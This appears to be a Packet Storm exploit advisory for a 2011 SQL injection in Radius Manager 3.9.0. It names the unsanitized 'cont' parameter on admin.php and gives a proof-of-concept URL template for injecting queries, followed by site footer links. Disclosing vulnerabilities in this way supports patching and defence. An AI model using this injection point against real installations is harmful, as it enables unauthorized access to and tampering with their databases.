Radius Manager version 3.9.0 suffers from a remote SQL injection vulnerability.
d7465d1cae603ceb6c99ab6cb16dcc593475dfd9122a239007bd547a0423fc45# Exploit Title: Radius Manager V3.9.0 Sql Injection
# Date: 16-10-2011
# Author: Mehdi Boukazoula
# Software Link: http://www.dmasoftlab.com
# Version: v 3.9.0
# Tested on: v 3.9.0 with Postgresql, PHP 5.2.6, Apache 2.2.8,
# Description : In the page of "http://127.0.0.1/admin.php" the parameter "cont" is not sanitized ,that make malicious user comunicate with the database server directely .
--------------------------------------------------------------------------------------------------------
# Code of exploit :
in the browser (FingerPrint PoC) URL :
http://HOST/admin.php?cont=cont=search_invoices'YOUR SQL QUERIE
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed